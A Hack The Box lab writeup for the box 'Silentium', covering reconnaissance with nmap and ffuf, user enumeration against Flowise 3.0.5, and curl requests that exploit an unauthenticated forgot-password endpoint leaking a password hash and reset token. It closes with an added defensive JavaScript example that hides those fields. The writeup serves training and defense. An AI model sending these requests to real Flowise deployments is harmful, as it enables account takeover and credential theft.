Hack The Box - Season 10 HTB Silentium Writeup - Easy - Weekly - April 12th, 2026

Summary

Silentium is an Easy Linux box hosting a corporate finance website and a staging Flowise AI platform behind a virtual host. The attack chain exploits three vulnerabilities.


Reconnaissance

Nmap Scan

nmap -sC -sV -p 22,80 <TARGET_IP>
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.15
80/tcp open  http    nginx 1.24.0 (Ubuntu)
|_http-title: Silentium | Institutional Capital & Lending Solutions

Two ports open: SSH and HTTP. Port 80 serves an nginx web server that redirects to silentium.htb.

Virtual Host Discovery

ffuf -u http://silentium.htb -H "Host: FUZZ.silentium.htb" \
  -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -ac

Discovered staging.silentium.htb (Status 200).

Added both hostnames to /etc/hosts:

<TARGET_IP> silentium.htb staging.silentium.htb

Enumeration

silentium.htb - Main Site

A static corporate website for "Silentium International Asset Management", an institutional finance firm. The team section lists:

  • Marcus Thorne - Managing Director
  • Ben - Head of Financial Systems
  • Elena Rossi - Chief Risk Officer

"Ben" is the only team member listed by first name alone, which makes it notable as a potential username.

staging.silentium.htb - Flowise 3.0.5

The staging subdomain runs Flowise 3.0.5, an open-source AI agent builder platform.

curl -s http://staging.silentium.htb/api/v1/version
# {"version":"3.0.5"}

Most API endpoints return {"error":"Unauthorized Access"}, confirming authentication is enabled.

User Enumeration

The Flowise login endpoint leaks whether a user exists by returning a different status code and error message for unknown and known accounts:

# Non-existent user returns 404
curl -s -X POST http://staging.silentium.htb/api/v1/auth/login \
  -H "Content-Type: application/json" \
  -d '{"email":"admin@silentium.htb","password":"test"}'
# {"statusCode":404,"message":"User Not Found"}

# Valid user returns 401
curl -s -X POST http://staging.silentium.htb/api/v1/auth/login \
  -H "Content-Type: application/json" \
  -d '{"email":"ben@silentium.htb","password":"test"}'
# {"statusCode":401,"message":"Incorrect Email or Password"}

Confirmed valid user: ben@silentium.htb


Initial Access

Step 1: GHSA-jc5m-wrp2-qq38 - PII Disclosure on Forgot Password

Vulnerability: Flowise <= 3.0.12 exposes sensitive user data (bcrypt password hash and password reset token) in the response of the unauthenticated forgot-password endpoint.

curl -s -X POST "http://staging.silentium.htb/api/v1/account/forgot-password" \
  -H "Content-Type: application/json" \
  -d '{"user":{"email":"ben@silentium.htb"}}'

Response (key fields):

{
  "user": {
    "id": "<REDACTED_UUID>",
    "name": "admin",
    "email": "ben@silentium.htb",
    "credential": "<REDACTED_BCRYPT_HASH>",
    "tempToken": "<REDACTED_TOKEN>",
    "tokenExpiry": "<REDACTED_TIMESTAMP>",
    "status": "active"
  }
}

Leaked data:

  • credential - bcrypt password hash (cost factor 5)
  • tempToken - password reset token (valid for 15 minutes)
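
Defensive counterpart to the two issues above (the login responses that distinguish unknown users, and the forgot-password response that returns credential and tempToken), as an added example that is not Flowise code and not part of the original writeup. The in-memory store, the deliver and verify callbacks and all values are constructed assumptions.

```javascript
// Added example, not Flowise code. Field names mirror the response above;
// every value is a constructed placeholder.
const USERS = new Map([['ben@silentium.htb', {
  id: 'constructed-uuid', name: 'admin', email: 'ben@silentium.htb',
  credential: 'constructed-hash', tempToken: 'constructed-token', status: 'active',
}]]);
// Stand-in record so unknown accounts cost the same hash verification.
const DUMMY = { credential: 'constructed-dummy-hash' };

// Allow-list serializer: only these fields can reach a client, so a new
// secret column added later is not exposed by default.
const PUBLIC_FIELDS = ['id', 'name', 'email', 'status'];
function toPublicUser(record) {
  const out = {};
  for (const f of PUBLIC_FIELDS) if (f in record) out[f] = record[f];
  return out;
}

// Forgot-password: identical status and body whether or not the account
// exists; the token leaves only through deliver (hypothetical mail callback).
function forgotPassword(email, deliver) {
  const user = USERS.get(String(email).toLowerCase());
  if (user) deliver(user.email, user.tempToken);
  return { status: 200, body: { message: 'If the account exists, a reset link was sent.' } };
}

// Login: one status and message for "no such user" and "wrong password".
// verify (hypothetical) checks a password against record.credential.
function login(email, password, verify) {
  const user = USERS.get(String(email).toLowerCase());
  const ok = verify(password, (user || DUMMY).credential); // always runs
  if (!user || !ok) {
    return { status: 401, body: { statusCode: 401, message: 'Incorrect Email or Password' } };
  }
  return { status: 200, body: { user: toPublicUser(user) } };
}

// Regression check: true if any key at any depth of a response body is secret.
const SECRET_KEYS = new Set(['credential', 'tempToken']);
function leaksSecrets(value) {
  if (value === null || typeof value !== 'object') return false;
  return Object.entries(value).some(([k, v]) => SECRET_KEYS.has(k) || leaksSecrets(v));
}
```

leaksSecrets can be run over captured responses from unauthenticated endpoints as a regression check.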